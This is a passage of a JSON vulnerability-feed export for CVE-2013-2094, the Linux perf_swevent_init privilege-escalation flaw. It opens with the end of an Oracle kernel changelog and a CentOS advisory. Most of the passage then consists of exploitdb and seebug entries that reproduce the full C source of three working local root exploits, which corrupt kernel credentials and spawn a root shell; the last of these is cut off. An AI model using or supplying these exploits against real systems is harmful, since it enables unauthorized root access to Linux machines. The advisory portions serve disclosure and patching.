Pass correct LUN address to firmware in case of lun_reset (Vikas Chaudhary) \r\n- qla4xxx: Fix double reset in case of firmware hung for ISP83XX (Vikas Chaudhary) \r\n- qla4xxx: Set graceful reset bit for ISP83XX (Vikas Chaudhary) \r\n- qla4xxx: Boot from SAN fix for ISP83XX (Vikas Chaudhary) \r\n- qla4xxx: Take E-port out of reset before disabling pause frames (Manish Dusane) \r\n- qla4xxx: Fix return code for qla4xxx_session_get_param. (Manish Rangankar) \r\n- qla4xxx: wait for boot target login response during probe (Manish Rangankar) \r\n- qla4xxx: Added support for force firmware dump (Vikas Chaudhary) \r\n- qla4xxx: Re-register IRQ handler while retrying initialize of adapter (Poornima Vonti) \r\n- qla4xxx: Throttle active IOCBs to firmware limits (Karen Higgins) \r\n- qla4xxx: Remove unnecessary code from qla4xxx_init_local_data (Karen Higgins) \r\n- qla4xxx: Quiesce driver activities while loopback (Nilesh Javali) \r\n- qla4xxx: Rename MBOX_ASTS_IDC_NOTIFY to MBOX_ASTS_IDC_REQUEST_NOTIFICATION (Nilesh Javali) \r\n- qla4xxx: Add spurious interrupt messages under debug level 2 (Nilesh Javali) \r\n- scsi_transport_iscsi: export iscsi class sessions target_id in sysfs. (Manish Rangankar) \r\n- r8169: fix auto speed down issue (hayeswang) \r\n- r8169: honor jumbo settings when chipset is requested to start. (francois romieu) \r\n- Revert 'r8169: enable internal ASPM and clock request settings'. (Francois Romieu) \r\n- Revert 'r8169: enable ALDPS for power saving'. (Francois Romieu) \r\n- r8169: fix vlan tag read ordering. 
(francois romieu) \r\n- r8169: remove the obsolete and incorrect AMD workaround (Timo Teras) \r\n- r8169: remove unneeded dirty_rx index (Timo Teras) \r\n- remove init of dev->perm_addr in drivers (Jiri Pirko) \r\n- r8169: workaround for missing extended GigaMAC registers (francois romieu) \r\n- r8169: remove __dev* attributes (Bill Pemberton) \r\n- r8169: Drop tp arg from rtl8169_tx_vlan_tag() (Kirill Smelkov) \r\n- r8169: remove unused macros. (Dayanidhi Sreenivasan) \r\n- r8169: enable internal ASPM and clock request settings (hayeswang) \r\n- r8169: allow multicast packets on sub-8168f chipset. (Nathan Walp) \r\n- r8169: Fix WoL on RTL8168d/8111d. (Cyril Brulebois) \r\n- r8169: Kill SafeMtu macro (Kirill Smelkov) \r\n- r8169: enable ALDPS for power saving (hayeswang) \r\n- hpsa: check for dma_mapping_error in hpsa_passthru ioctls (Stephen M. Cameron) \r\n- hpsa: reorganize error handling in hpsa_passthru_ioctl (Stephen M. Cameron) \r\n- hpsa: check for dma_mapping_error in hpsa_map_sg_chain_block (Stephen M. Cameron) \r\n- hpsa: Check for dma_mapping_error for all code paths using fill_cmd (Stephen M. Cameron) \r\n- hpsa: Check for dma_mapping_error in hpsa_map_one (Shuah Khan) \r\n- Drivers: scsi: remove __dev* attributes. (Greg Kroah-Hartman) \r\n- hpsa: removed unused member maxQsinceinit (Stephen M. 
Cameron) \r\n- hpsa: use check_signature (Akinobu Mita) \r\n- iser: panic on iser connect (Shamir Rabinovitch) [Orabug: 16313854] \r\n- Btrfs: fix backport conflicts (Liu Bo) \r\n- Revert 'Btrfs: using for_each_set_bit_from to simplify the code' (Liu Bo) \r\n- Revert 'Btrfs: move the sb_end_intwrite until after the throttle logic' (Liu Bo) \r\n- Revert 'btrfs: Convert to new freezing mechanism' (Liu Bo) \r\n- Revert 'Btrfs: add qgroup inheritance' (Liu Bo) \r\n- Revert 'Btrfs: call the qgroup acco", "edition": 72, "modified": "2013-06-12T00:00:00", "published": "2013-06-12T00:00:00", "id": "ELSA-2013-2525", "href": "http://linux.oracle.com/errata/ELSA-2013-2525.html", "title": "Unbreakable Enterprise kernel Security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:28:03", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "**CentOS Errata and Security Advisory** CESA-2013:0830\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue:\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a user-supplied\nindex into the perf_swevent_enabled array not being validated properly,\nresulting in out-of-bounds kernel memory access. A local, unprivileged user\ncould use this flaw to escalate their privileges. (CVE-2013-2094,\nImportant)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the References,\nfor further information and mitigation instructions for users who are\nunable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct this issue. 
The system must be rebooted for this update to\ntake effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-May/031771.html\n\n**Affected packages:**\nkernel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-firmware\nkernel-headers\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0830.html", "edition": 3, "modified": "2013-05-17T00:36:04", "published": "2013-05-17T00:36:04", "href": "http://lists.centos.org/pipermail/centos-announce/2013-May/031771.html", "id": "CESA-2013:0830", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-03T01:23:03", "description": "Linux Kernel 2.6.37 <= 3.x.x - PERF_EVENTS Local Root Exploit. CVE-2013-2094. Local exploit for linux platform", "published": "2013-05-14T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.37 <= 3.x.x - PERF_EVENTS Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "modified": "2013-05-14T00:00:00", "id": "EDB-ID:25444", "href": "https://www.exploit-db.com/exploits/25444/", "sourceData": "/*\r\n * linux 2.6.37-3.x.x x86_64, ~100 LOC\r\n * gcc-4.6 -O2 semtex.c && ./a.out\r\n * 2010 sd@fucksheep.org, salut!\r\n *\r\n * update may 2013:\r\n * seems like centos 2.6.32 backported the perf bug, lol.\r\n * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.\r\n */\r\n\r\n#define _GNU_SOURCE 1\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <sys/mman.h>\r\n#include <syscall.h>\r\n#include <stdint.h>\r\n#include <assert.h>\r\n\r\n#define BASE 0x380000000\r\n#define SIZE 0x010000000\r\n#define KSIZE 0x2000000\r\n#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))\r\n\r\nvoid fuck() {\r\n int i,j,k;\r\n uint64_t uids[4] = { AB(2), AB(3), AB(4), 
AB(5) };\r\n uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));\r\n uint64_t kbase = ((uint64_t)current)>>36;\r\n uint32_t *fixptr = (void*) AB(1);\r\n *fixptr = -1;\r\n\r\n for (i=0; i<4000; i+=4) {\r\n uint64_t *p = (void *)&current[i];\r\n uint32_t *t = (void*) p[0];\r\n if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;\r\n for (j=0; j<20; j++) { for (k = 0; k < 8; k++)\r\n if (((uint32_t*)uids)[k] != t[j+k]) goto next;\r\n for (i = 0; i < 8; i++) t[j+i] = 0;\r\n for (i = 0; i < 10; i++) t[j+9+i] = -1;\r\n return;\r\nnext:; }\r\n }\r\n}\r\n\r\nvoid sheep(uint32_t off) {\r\n uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };\r\n int fd = syscall(298, buf, 0, -1, -1, 0);\r\n assert(!close(fd));\r\n}\r\n\r\n\r\nint main() {\r\n uint64_t u,g,needle, kbase, *p; uint8_t *code;\r\n uint32_t *map, j = 5;\r\n int i;\r\n struct {\r\n uint16_t limit;\r\n uint64_t addr;\r\n } __attribute__((packed)) idt;\r\n assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);\r\n memset(map, 0, SIZE);\r\n sheep(-1); sheep(-2);\r\n for (i = 0; i < SIZE/4; i++) if (map[i]) {\r\n assert(map[i+1]);\r\n break;\r\n }\r\n assert(i<SIZE/4);\r\n asm (\"sidt %0\" : \"=m\" (idt));\r\n kbase = idt.addr & 0xff000000;\r\n u = getuid(); g = getgid();\r\n assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);\r\n memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);\r\n memcpy(code-13,\"\\x0f\\x01\\xf8\\xe8\\5\\0\\0\\0\\x0f\\x01\\xf8\\x48\\xcf\",\r\n printf(\"2.6.37-3.x x86_64\\nsd@fucksheep.org 2010\\n\") % 27);\r\n setresuid(u,u,u); setresgid(g,g,g);\r\n while (j--) {\r\n needle = AB(j+1);\r\n assert(p = memmem(code, 1024, &needle, 8));\r\n if (!p) continue;\r\n *p = j?((g<<32)|u):(idt.addr + 0x48);\r\n }\r\n sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);\r\n asm(\"int $0x4\"); assert(!setuid(0));\r\n return execl(\"/bin/bash\", \"-sh\", NULL);\r\n}", "cvss": {"score": 7.2, "vector": 
"AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/25444/"}, {"lastseen": "2016-02-03T19:30:04", "description": "Ubuntu 12.04.0-2LTS x64 - perf_swevent_init Kernel Local Root Exploit. CVE-2013-2094. Local exploit for linux platform", "published": "2014-05-31T00:00:00", "type": "exploitdb", "title": "Ubuntu 12.04.0-2LTS x64 - perf_swevent_init Kernel Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "modified": "2014-05-31T00:00:00", "id": "EDB-ID:33589", "href": "https://www.exploit-db.com/exploits/33589/", "sourceData": "/**\r\n * Ubuntu 12.04 3.x x86_64 perf_swevent_init Local root exploit\r\n * by Vitaly Nikolenko (vnik5287@gmail.com)\r\n * \r\n * based on semtex.c by sd\r\n *\r\n * Supported targets:\r\n * [0] Ubuntu 12.04.0 - 3.2.0-23-generic\r\n * [1] Ubuntu 12.04.1 - 3.2.0-29-generic\r\n * [2] Ubuntu 12.04.2 - 3.5.0-23-generic\r\n *\r\n * $ gcc vnik.c -O2 -o vnik\r\n *\r\n * $ uname -r\r\n * 3.2.0-23-generic\r\n *\r\n * $ ./vnik 0\r\n */\r\n \r\n#define _GNU_SOURCE 1\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <sys/mman.h>\r\n#include <syscall.h>\r\n#include <stdint.h>\r\n#include <assert.h>\r\n \r\n#define BASE 0x1780000000\r\n#define SIZE 0x0010000000\r\n#define KSIZE 0x2000000\r\n#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))\r\n \r\ntypedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred);\r\n\r\nuint64_t targets[3][3] =\r\n {{0xffffffff81ef67e0, // perf_swevent_enabled\r\n 0xffffffff81091630, // commit_creds\r\n 0xffffffff810918e0}, // prepare_kernel_cred\r\n {0xffffffff81ef67a0,\r\n 0xffffffff81091220,\r\n 0xffffffff810914d0},\r\n {0xffffffff81ef5940,\r\n 0xffffffff8107ee30,\r\n 0xffffffff8107f0c0}\r\n\t };\r\n\r\nvoid 
__attribute__((regparm(3))) payload() {\r\n\tuint32_t *fixptr = (void*)AB(1);\r\n\t// restore the handler\r\n\t*fixptr = -1;\r\n\tcommit_creds_fn commit_creds = (commit_creds_fn)AB(2);\r\n\tprepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)AB(3);\r\n\tcommit_creds(prepare_kernel_cred((uint64_t)NULL));\r\n}\r\n \r\nvoid trigger(uint32_t off) {\r\n\tuint64_t buf[10] = { 0x4800000001, off, 0, 0, 0, 0x300 };\r\n\tint fd = syscall(298, buf, 0, -1, -1, 0);\r\n\tassert( !close(fd) );\r\n}\r\n \r\nint main(int argc, char **argv) {\r\n\tuint64_t off64, needle, kbase, *p;\r\n\tuint8_t *code;\r\n\tuint32_t int_n, j = 5, target = 1337;\r\n\tint offset = 0;\r\n\tvoid *map;\r\n\r\n\tassert(argc == 2 && \"target?\");\r\n\tassert( (target = atoi(argv[1])) < 3 );\r\n\r\n\tstruct {\r\n\t\tuint16_t limit;\r\n\t\tuint64_t addr;\r\n\t} __attribute__((packed)) idt;\r\n\r\n\t// mmap user-space block so we don't page fault\r\n\t// on sw_perf_event_destroy\r\n\tassert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);\r\n\tmemset(map, 0, SIZE);\r\n\r\n\tasm volatile(\"sidt %0\" : \"=m\" (idt));\r\n\tkbase = idt.addr & 0xff000000;\r\n\tprintf(\"IDT addr = 0x%lx\\n\", idt.addr);\r\n\r\n\tassert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);\r\n\tmemset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &payload, 1024);\r\n\tmemcpy(code-13,\"\\x0f\\x01\\xf8\\xe8\\5\\0\\0\\0\\x0f\\x01\\xf8\\x48\\xcf\", 13);\r\n\r\n\t// can only play with interrupts 3, 4 and 0x80\r\n\tfor (int_n = 3; int_n <= 0x80; int_n++) {\r\n\t\tfor (off64 = 0x00000000ffffffff; (int)off64 < 0; off64--) {\r\n\t\t\tint off32 = off64;\r\n\t\r\n\t\t\tif ((targets[target][0] + ((uint64_t)off32)*24) == (idt.addr + int_n*16 + 8)) {\r\n\t\t\t\toffset = off32;\r\n\t\t\t\tgoto out;\r\n\t\t\t}\r\n\t\t}\r\n\t\tif (int_n == 4) {\r\n\t\t\t// shit, let's try 0x80 if the kernel is compiled with\r\n\t\t\t// CONFIG_IA32_EMULATION\r\n\t\t\tint_n = 0x80 - 
1;\r\n\t\t}\r\n\t}\r\nout:\r\n\tassert(offset);\r\n\tprintf(\"Using int = %d with offset = %d\\n\", int_n, offset);\r\n\r\n\tfor (j = 0; j < 3; j++) {\r\n\t\tneedle = AB(j+1);\r\n\t\tassert(p = memmem(code, 1024, &needle, 8));\r\n\t\t*p = !j ? (idt.addr + int_n * 16 + 8) : targets[target][j];\r\n\t}\r\n\ttrigger(offset);\r\n\tswitch (int_n) {\r\n\tcase 3:\r\n\t\tasm volatile(\"int $0x03\");\r\n\t\tbreak;\r\n\tcase 4:\r\n\t\tasm volatile(\"int $0x04\");\r\n\t\tbreak;\r\n\tcase 0x80:\r\n\t\tasm volatile(\"int $0x80\");\r\n\t}\r\n\r\n\tassert(!setuid(0));\r\n\treturn execl(\"/bin/bash\", \"-sh\", NULL);\r\n}\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/33589/"}, {"lastseen": "2016-02-03T02:54:54", "description": "Linux Kernel < 3.8.9 - x86_64 perf_swevent_init Local Root Exploit. CVE-2013-2094. Local exploit for linux platform", "published": "2013-06-11T00:00:00", "type": "exploitdb", "title": "Linux Kernel < 3.8.9 - x86_64 perf_swevent_init Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "modified": "2013-06-11T00:00:00", "id": "EDB-ID:26131", "href": "https://www.exploit-db.com/exploits/26131/", "sourceData": "/*\r\n * CVE-2013-2094 exploit x86_64 Linux < 3.8.9\r\n * by sorbo (sorbo@darkircop.org) June 2013\r\n *\r\n * Based on sd's exploit. 
Supports more targets.\r\n *\r\n */\r\n\r\n#define _GNU_SOURCE\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <sys/syscall.h>\r\n#include <sys/mman.h>\r\n#include <linux/perf_event.h>\r\n#include <signal.h>\r\n#include <assert.h>\r\n\r\n#define BASE\t\t0x380000000\r\n#define BASE_JUMP\t0x1780000000\r\n#define SIZE \t\t0x10000000\r\n#define KSIZE\t\t0x2000000\r\n\r\n#define TMP(x) (0xdeadbeef + (x))\r\n\r\nstruct idt {\r\n\tuint16_t limit;\r\n\tuint64_t addr;\r\n} __attribute__((packed));\r\n\r\nstatic int _fd;\r\n\r\nstatic int perf_open(uint64_t off)\r\n{\r\n\tstruct perf_event_attr attr;\r\n\tint rc;\r\n\r\n//\tprintf(\"perf open %lx [%d]\\n\", off, (int) off);\r\n\r\n\tmemset(&attr, 0, sizeof(attr));\r\n\r\n\tattr.type \t = PERF_TYPE_SOFTWARE;\r\n\tattr.size \t = sizeof(attr);\r\n\tattr.config \t = off;\r\n\tattr.mmap \t = 1;\r\n\tattr.comm \t = 1;\r\n\tattr.exclude_kernel = 1;\r\n\r\n\trc = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);\r\n\r\n\treturn rc;\r\n}\r\n\r\nvoid __sc_start(void);\r\nvoid __sc_next(void);\r\n\r\nvoid __sc(void)\r\n{\r\n\tasm(\"__sc_start:\\n\"\r\n\t \"call __sc_next\\n\"\r\n\t \"iretq\\n\"\r\n\t \"__sc_next:\\n\");\r\n}\r\n\r\nvoid sc(void)\r\n{\r\n\tint i, j;\r\n\tuint8_t *current = *(uint8_t **)(((uint64_t) &i) & (-8192));\r\n\tuint64_t kbase = ((uint64_t)current) >> 36;\r\n\tint uid = TMP(1);\r\n\tint gid = TMP(2);\r\n\r\n\tfor (i = 0; i < 4000; i += 4) {\r\n\t\tuint64_t *p = (void *) &current[i];\r\n\t\tuint32_t *cred = (uint32_t*) p[0];\r\n\r\n\t\tif ((p[0] != p[1]) || ((p[0]>>36) != kbase))\r\n\t\t\tcontinue;\r\n\r\n\t\tfor (j = 0; j < 20; j++) {\r\n\t\t\tif (cred[j] == uid && cred[j + 1] == gid) {\r\n\t\t\t\tfor (i = 0; i < 8; i++) {\r\n\t\t\t\t\tcred[j + i] = 0;\r\n\t\t\t\t\treturn;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n\r\nstatic void sc_replace(uint8_t *sc, uint32_t needle, uint32_t val)\r\n{\r\n\tvoid *p;\r\n\r\n\tp = memmem(sc, 900, 
&needle, sizeof(needle));\r\n\tif (!p)\r\n\t\terrx(1, \"can't find %x\", needle);\r\n\r\n\tmemcpy(p, &val, sizeof(val));\r\n}\r\n\r\nstatic void *map_mem(uint64_t addr)\r\n{\r\n\tvoid *p;\r\n\r\n\tp = mmap((void*) addr, SIZE, PROT_READ | PROT_WRITE,\r\n\t\t MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);\r\n\r\n\tif (p == MAP_FAILED)\r\n\t\terr(1, \"mmap()\");\r\n\r\n\treturn p;\r\n}\r\n\r\nstatic int find_mem(void *mem, uint8_t c)\r\n{\r\n\tint i;\r\n\tuint8_t *p = mem;\r\n\r\n\tfor (i = 0; i < SIZE; i++) {\r\n\t\tif (p[i] == c)\r\n\t\t\treturn i;\r\n\t}\r\n\r\n\treturn -1;\r\n}\r\n\r\nstatic void dropshell()\r\n{\r\n\tif (setuid(0) != 0)\r\n\t\terrx(1, \"failed\");\r\n\r\n\tprintf(\"Launching shell\\n\");\r\n\r\n\texecl(\"/bin/sh\", \"sh\", NULL);\r\n\texit(0);\r\n}\r\n\r\nvoid morte(int x)\r\n{\r\n\tprintf(\"Got signal\\n\");\r\n\tclose(_fd);\r\n\tdropshell();\r\n}\r\n\r\nstatic void trigger(int intr)\r\n{\r\n\tswitch (intr) {\r\n\tcase 0:\r\n\t\tdo {\r\n\t\t\tint z = 1;\r\n\t\t\tint a = 1;\r\n\r\n\t\t\tz--;\r\n\r\n\t\t\ta /= z;\r\n\t\t} while (0);\r\n\t\tbreak;\r\n\r\n\tcase 4:\r\n\t\tasm(\"int $4\");\r\n\t\tbreak;\r\n\r\n\tcase 0x80:\r\n\t\tasm(\"int $0x80\");\r\n\t\tbreak;\r\n\r\n\tdefault:\r\n\t\terrx(1, \"unknown intr %d\", intr);\r\n\t}\r\n\r\n\tsleep(3);\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tuint32_t *p[2];\r\n\tint fd, i;\r\n\tuint64_t off;\r\n\tuint64_t addr = BASE;\r\n\tstruct idt idt;\r\n\tuint8_t *kbase;\r\n\tint sz = 4;\r\n\tint intr = 4;\r\n\r\n\tprintf(\"Searchin...\\n\");\r\n\r\n\tp[0] = map_mem(BASE);\r\n\tp[1] = map_mem(BASE_JUMP);\r\n\r\n\tmemset(p[1], 0x69, SIZE);\r\n\r\n\toff = 0xFFFFFFFFL;\r\n\tfd = perf_open(off);\r\n\tclose(fd);\r\n\r\n\ti = find_mem(p[0], 0xff);\r\n\tif (i == -1) {\r\n\t\ti = find_mem(p[1], 0x68);\r\n\r\n\t\tif (i == -1)\r\n\t\t\terrx(1, \"Can't find overwrite\");\r\n\r\n\t\tsz = 24;\r\n\t\taddr = BASE_JUMP;\r\n\t\tprintf(\"detected CONFIG_JUMP_LABEL\\n\");\r\n\t}\r\n\r\n\tmunmap(p[0], 
SIZE);\r\n\tmunmap(p[1], SIZE);\r\n\r\n\taddr += i;\r\n\taddr -= off * sz;\r\n\r\n\tprintf(\"perf_swevent_enabled is at 0x%lx\\n\", addr);\r\n\r\n\tasm(\"sidt %0\" : \"=m\" (idt));\r\n\r\n\tprintf(\"IDT at 0x%lx\\n\", idt.addr);\r\n\r\n\toff = addr - idt.addr;\r\n\toff -= 8;\r\n\r\n\tswitch (off % sz) {\r\n\tcase 0:\r\n\t\tintr = 0;\r\n\t\tbreak;\r\n\r\n\tcase 8:\r\n\t\tintr = 0x80;\r\n\t\tbreak;\r\n\r\n\tcase 16:\r\n\t\tintr = 4;\r\n\t\tbreak;\r\n\r\n\tdefault:\r\n\t\terrx(1, \"remainder %d\", off % sz);\r\n\t}\r\n\r\n\tprintf(\"Using interrupt %d\\n\", intr);\r\n\r\n\toff -= 16 * intr;\r\n\r\n\tassert((off % sz) == 0);\r\n\r\n\toff /= sz;\r\n\toff = -off;\r\n\r\n//\tprintf(\"Offset %lx\\n\", off);\r\n\r\n\tkbase = (uint8_t*) (idt.addr & 0xFF000000);\r\n\r\n\tprintf(\"Shellcode at %p\\n\", kbase);\r\n\r\n\tif (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC,\r\n\t MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) == MAP_FAILED)\r\n\t\terr(1, \"mmap()\");\r\n\r\n\tmemset(kbase, 0x90, KSIZE);\r\n\tkbase += KSIZE - 1024;\r\n\r\n\ti = __sc_next - __sc_start;\r\n\tmemcpy(kbase, __sc_start, i);\r\n\tkbase += i;\r\n\tmemcpy(kbase, sc, 900);\r\n\r\n\tsc_replace(kbase, TMP(1), getuid());\r\n\tsc_replace(kbase, TMP(2), getgid());\r\n\r\n\tsignal(SIGALRM, morte);\r\n\talarm(2);\r\n\r\n\tprintf(\"Triggering sploit\\n\");\r\n\t_fd = perf_open(off);\r\n\r\n\ttrigger(intr);\r\n\r\n\texit(0);\r\n}\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/26131/"}], "seebug": [{"lastseen": "2017-11-19T15:59:19", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Linux Kernel < 3.8.9 - x86_64 perf_swevent_init Local Root Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-79777", "id": "SSV:79777", "sourceData": "\n /*\r\n * 
CVE-2013-2094 exploit x86_64 Linux < 3.8.9\r\n * by sorbo (sorbo@darkircop.org) June 2013\r\n *\r\n * Based on sd's exploit. Supports more targets.\r\n *\r\n */\r\n\r\n#define _GNU_SOURCE\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <sys/syscall.h>\r\n#include <sys/mman.h>\r\n#include <linux/perf_event.h>\r\n#include <signal.h>\r\n#include <assert.h>\r\n\r\n#define BASE\t\t0x380000000\r\n#define BASE_JUMP\t0x1780000000\r\n#define SIZE \t\t0x10000000\r\n#define KSIZE\t\t0x2000000\r\n\r\n#define TMP(x) (0xdeadbeef + (x))\r\n\r\nstruct idt {\r\n\tuint16_t limit;\r\n\tuint64_t addr;\r\n} __attribute__((packed));\r\n\r\nstatic int _fd;\r\n\r\nstatic int perf_open(uint64_t off)\r\n{\r\n\tstruct perf_event_attr attr;\r\n\tint rc;\r\n\r\n//\tprintf("perf open %lx [%d]\\n", off, (int) off);\r\n\r\n\tmemset(&attr, 0, sizeof(attr));\r\n\r\n\tattr.type \t = PERF_TYPE_SOFTWARE;\r\n\tattr.size \t = sizeof(attr);\r\n\tattr.config \t = off;\r\n\tattr.mmap \t = 1;\r\n\tattr.comm \t = 1;\r\n\tattr.exclude_kernel = 1;\r\n\r\n\trc = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);\r\n\r\n\treturn rc;\r\n}\r\n\r\nvoid __sc_start(void);\r\nvoid __sc_next(void);\r\n\r\nvoid __sc(void)\r\n{\r\n\tasm("__sc_start:\\n"\r\n\t "call __sc_next\\n"\r\n\t "iretq\\n"\r\n\t "__sc_next:\\n");\r\n}\r\n\r\nvoid sc(void)\r\n{\r\n\tint i, j;\r\n\tuint8_t *current = *(uint8_t **)(((uint64_t) &i) & (-8192));\r\n\tuint64_t kbase = ((uint64_t)current) >> 36;\r\n\tint uid = TMP(1);\r\n\tint gid = TMP(2);\r\n\r\n\tfor (i = 0; i < 4000; i += 4) {\r\n\t\tuint64_t *p = (void *) &current[i];\r\n\t\tuint32_t *cred = (uint32_t*) p[0];\r\n\r\n\t\tif ((p[0] != p[1]) || ((p[0]>>36) != kbase))\r\n\t\t\tcontinue;\r\n\r\n\t\tfor (j = 0; j < 20; j++) {\r\n\t\t\tif (cred[j] == uid && cred[j + 1] == gid) {\r\n\t\t\t\tfor (i = 0; i < 8; i++) {\r\n\t\t\t\t\tcred[j + i] = 
0;\r\n\t\t\t\t\treturn;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n\r\nstatic void sc_replace(uint8_t *sc, uint32_t needle, uint32_t val)\r\n{\r\n\tvoid *p;\r\n\r\n\tp = memmem(sc, 900, &needle, sizeof(needle));\r\n\tif (!p)\r\n\t\terrx(1, "can't find %x", needle);\r\n\r\n\tmemcpy(p, &val, sizeof(val));\r\n}\r\n\r\nstatic void *map_mem(uint64_t addr)\r\n{\r\n\tvoid *p;\r\n\r\n\tp = mmap((void*) addr, SIZE, PROT_READ | PROT_WRITE,\r\n\t\t MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);\r\n\r\n\tif (p == MAP_FAILED)\r\n\t\terr(1, "mmap()");\r\n\r\n\treturn p;\r\n}\r\n\r\nstatic int find_mem(void *mem, uint8_t c)\r\n{\r\n\tint i;\r\n\tuint8_t *p = mem;\r\n\r\n\tfor (i = 0; i < SIZE; i++) {\r\n\t\tif (p[i] == c)\r\n\t\t\treturn i;\r\n\t}\r\n\r\n\treturn -1;\r\n}\r\n\r\nstatic void dropshell()\r\n{\r\n\tif (setuid(0) != 0)\r\n\t\terrx(1, "failed");\r\n\r\n\tprintf("Launching shell\\n");\r\n\r\n\texecl("/bin/sh", "sh", NULL);\r\n\texit(0);\r\n}\r\n\r\nvoid morte(int x)\r\n{\r\n\tprintf("Got signal\\n");\r\n\tclose(_fd);\r\n\tdropshell();\r\n}\r\n\r\nstatic void trigger(int intr)\r\n{\r\n\tswitch (intr) {\r\n\tcase 0:\r\n\t\tdo {\r\n\t\t\tint z = 1;\r\n\t\t\tint a = 1;\r\n\r\n\t\t\tz--;\r\n\r\n\t\t\ta /= z;\r\n\t\t} while (0);\r\n\t\tbreak;\r\n\r\n\tcase 4:\r\n\t\tasm("int $4");\r\n\t\tbreak;\r\n\r\n\tcase 0x80:\r\n\t\tasm("int $0x80");\r\n\t\tbreak;\r\n\r\n\tdefault:\r\n\t\terrx(1, "unknown intr %d", intr);\r\n\t}\r\n\r\n\tsleep(3);\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tuint32_t *p[2];\r\n\tint fd, i;\r\n\tuint64_t off;\r\n\tuint64_t addr = BASE;\r\n\tstruct idt idt;\r\n\tuint8_t *kbase;\r\n\tint sz = 4;\r\n\tint intr = 4;\r\n\r\n\tprintf("Searchin...\\n");\r\n\r\n\tp[0] = map_mem(BASE);\r\n\tp[1] = map_mem(BASE_JUMP);\r\n\r\n\tmemset(p[1], 0x69, SIZE);\r\n\r\n\toff = 0xFFFFFFFFL;\r\n\tfd = perf_open(off);\r\n\tclose(fd);\r\n\r\n\ti = find_mem(p[0], 0xff);\r\n\tif (i == -1) {\r\n\t\ti = find_mem(p[1], 0x68);\r\n\r\n\t\tif (i == -1)\r\n\t\t\terrx(1, 
